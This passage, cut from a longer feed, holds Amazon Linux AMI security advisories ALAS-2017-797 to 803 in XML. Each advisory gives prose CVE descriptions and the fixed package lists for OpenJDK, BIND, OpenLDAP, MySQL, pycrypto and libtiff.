author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-797</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-797: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3289:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts).
1413562:
CVE-2017-3289 OpenJDK: insecure class construction (Hotspot, 8167104)
CVE-2017-3272:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts).
1413554:
CVE-2017-3272 OpenJDK: insufficient protected field access checks in atomic field updaters (Libraries, 8165344)
CVE-2017-3261:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 4.3 (Confidentiality impacts).
1413653:
CVE-2017-3261 OpenJDK: integer overflow in SocketOutputStream boundary check (Networking, 8164147)
CVE-2017-3253:
It was discovered that the 2D component of OpenJDK performed parsing of iTXt and zTXt PNG image chunks even when configured to ignore metadata. An attacker able to make a Java application parse a specially crafted PNG image could cause the application to consume an excessive amount of memory.
1413583:
CVE-2017-3253 OpenJDK: imageio PNGImageReader failed to honor ignoreMetadata for iTXt and zTXt chunks (2D, 8166988)
CVE-2017-3252:
It was discovered that the JAAS component of OpenJDK did not use the correct way to extract user DN from the result of the user search LDAP query. A specially crafted user LDAP entry could cause the application to use an incorrect DN.
1413906:
CVE-2017-3252 OpenJDK: LdapLoginModule incorrect userDN extraction (JAAS, 8161743)
CVE-2017-3241:
It was discovered that the RMI registry and DCG implementations in the RMI component of OpenJDK performed deserialization of untrusted inputs. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1413955:
CVE-2017-3241 OpenJDK: untrusted input deserialization in RMI registry and DCG (RMI, 8156802)
CVE-2017-3231:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 4.3 (Confidentiality impacts).
1413717:
CVE-2017-3231 OpenJDK: URLClassLoader insufficient access control checks (Networking, 8151934)
CVE-2016-5552:
It was discovered that the Networking component of OpenJDK failed to properly parse user info from the URL. A remote attacker could cause a Java application to incorrectly parse an attacker supplied URL and interpret it differently from other applications processing the same URL.
1413882:
CVE-2016-5552 OpenJDK: incorrect URL parsing in URLStreamHandler (Networking, 8167223)
CVE-2016-5548:
A covert timing channel flaw was found in the DSA implementation in the Libraries component of OpenJDK. A remote attacker could possibly use this flaw to extract certain information about the used key via a timing side channel.
1413920:
CVE-2016-5548 OpenJDK: DSA implementation timing attack (Libraries, 8168728)
CVE-2016-5547:
It was discovered that the Libraries component of OpenJDK did not validate the length of the object identifier read from the DER input before allocating memory to store the OID. An attacker able to make a Java application decode a specially crafted DER input could cause the application to consume an excessive amount of memory.
1413764:
CVE-2016-5547 OpenJDK: missing ObjectIdentifier length check (Libraries, 8168705)
CVE-2016-5546:
It was discovered that the Libraries component of OpenJDK accepted ECDSA signatures using non-canonical DER encoding. This could cause a Java application to accept signature in an incorrect format not accepted by other cryptographic tools.
1413911:
CVE-2016-5546 OpenJDK: incorrect ECDSA signature extraction from the DER input (Libraries, 8168714)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5546" title="" id="CVE-2016-5546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5547" title="" id="CVE-2016-5547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5548" title="" id="CVE-2016-5548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5552" title="" id="CVE-2016-5552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3231" title="" id="CVE-2017-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3241" title="" id="CVE-2017-3241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3252" title="" id="CVE-2017-3252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3253" title="" id="CVE-2017-3253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3261" title="" id="CVE-2017-3261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3272" title="" id="CVE-2017-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3289" title="" id="CVE-2017-3289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.131-2.6.9.0.70.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-798</id><title>Amazon Linux 
AMI 2014.03 - ALAS-2017-798: important priority package update for bind</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9147:
A denial of service flaw was found in the way BIND handled a query response containing inconsistent DNSSEC information. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
1411367:
CVE-2016-9147 bind: assertion failure while handling a query response containing inconsistent DNSSEC information
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9147" title="" id="CVE-2016-9147" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-799</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-799: medium priority package update for openldap</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3276:
A flaw was found in the way OpenLDAP parsed OpenSSL-style cipher strings. As a result, OpenLDAP could potentially use ciphers that were not intended to be enabled.
1238322:
CVE-2015-3276 openldap: incorrect multi-keyword mode cipherstring parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3276" title="" id="CVE-2015-3276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="12.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/openldap-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-12.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-800</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-800: important priority package update for mysql51</title><issued date="2017-02-22 18:00:00" /><updated date="2017-02-22 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6663:
A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.
1378936:
CVE-2016-6663 CVE-2016-5616 mysql: race condition while setting stats during MyISAM table repair (CPU Oct 2016)
CVE-2016-6662:
It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.
1375198:
CVE-2016-6662 mysql: general_log can write to configuration files, leading to privilege escalation (CPU Oct 2016)
CVE-2016-5616:
A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.
1378936:
CVE-2016-6663 CVE-2016-5616 mysql: race condition while setting stats during MyISAM table repair (CPU Oct 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616" title="" id="CVE-2016-5616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662" title="" id="CVE-2016-6662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6663" title="" id="CVE-2016-6663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-server" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="8.72.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql51-bench-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="8.72.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-embedded-5.1.73-8.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-801</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-801: important priority package update for python-crypto</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7459:
Heap-based buffer overflow in the ALGnew function in block_template.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code as demonstrated by a crafted iv parameter to cryptmsg.py.
1409754:
CVE-2013-7459 pycrypto: Heap-buffer overflow in ALGobject structure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7459" title="" id="CVE-2013-7459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-crypto-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-crypto-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python26-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python26-crypto-2.6.1-1.14.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.14.amzn1.i686.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python27-crypto-2.6.1-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-802</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-802: medium priority package update for libtiff compat-libtiff3</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9540:
tools/tiffcp.c in libtiff 4.0.6 has an out-of-bounds write on tiled images with odd tile width versus image width. Reported as MSVR 35103, aka &quot;cpStripToTile heap-buffer-overflow.&quot;
1397768:
CVE-2016-9540 libtiff: cpStripToTile heap-buffer-overflow
CVE-2016-9537:
tools/tiffcrop.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in buffers. Reported as MSVR 35093, MSVR 35096, and MSVR 35097.
1397760:
CVE-2016-9537 libtiff: Out-of-bounds write vulnerabilities in tools/tiffcrop.c
CVE-2016-9536:
tools/tiff2pdf.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in heap allocated buffers in t2p_process_jpeg_strip(). Reported as MSVR 35098, aka &quot;t2p_process_jpeg_strip heap-buffer-overflow.&quot;
1397758:
CVE-2016-9536 libtiff: t2p_process_jpeg_strip heap-buffer-overflow
CVE-2016-9535:
tif_predict.h and tif_predict.c in libtiff 4.0.6 have assertions that can lead to assertion failures in debug mode, or buffer overflows in release mode, when dealing with unusual tile size like YCbCr with subsampling. Reported as MSVR 35105, aka &quot;Predictor heap-buffer-overflow.&quot;
1397755:
CVE-2016-9535 libtiff: Predictor heap-buffer-overflow
CVE-2016-9534:
tif_write.c in libtiff 4.0.6 has an issue in the error code path of TIFFFlushData1() that didn&#039;t reset the tif_rawcc and tif_rawcp members. Reported as MSVR 35095, aka &quot;TIFFFlushData1 heap-buffer-overflow.&quot;
1397751:
CVE-2016-9534 libtiff: TIFFFlushData1 heap-buffer-overflow
CVE-2016-9533:
tif_pixarlog.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in heap allocated buffers. Reported as MSVR 35094, aka &quot;PixarLog horizontalDifference heap-buffer-overflow.&quot;
1397769:
CVE-2016-9533 libtiff: PixarLog horizontalDifference heap-buffer-overflow
CVE-2016-5652:
An exploitable heap-based buffer overflow exists in the handling of TIFF images in LibTIFF&#039;s TIFF2PDF tool. A crafted TIFF document can lead to a heap-based buffer overflow resulting in remote code execution. Vulnerability can be triggered via a saved TIFF file delivered by other means.
1389222:
CVE-2016-5652 libtiff: tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2015-8870:
Integer overflow in tools/bmp2tiff.c in LibTIFF before 4.0.4 allows remote attackers to cause a denial of service (heap-based buffer over-read), or possibly obtain sensitive information from process memory, via crafted width and length values in RLE4 or RLE8 data in a BMP file.
1402778:
CVE-2015-8870 libtiff: Integer overflow in tools/bmp2tiff.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8870" title="" id="CVE-2015-8870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5652" title="" id="CVE-2016-5652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9533" title="" id="CVE-2016-9533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9534" title="" id="CVE-2016-9534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9535" title="" id="CVE-2016-9535" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9536" title="" id="CVE-2016-9536" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9537" title="" id="CVE-2016-9537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9540" title="" id="CVE-2016-9540" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" 
release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="21.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-21.15.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="21.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-3.9.4-21.15.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="21.15.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-21.15.amzn1.i686.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="21.15.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-3.9.4-21.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-803</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-803: medium priority package update for openssl</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 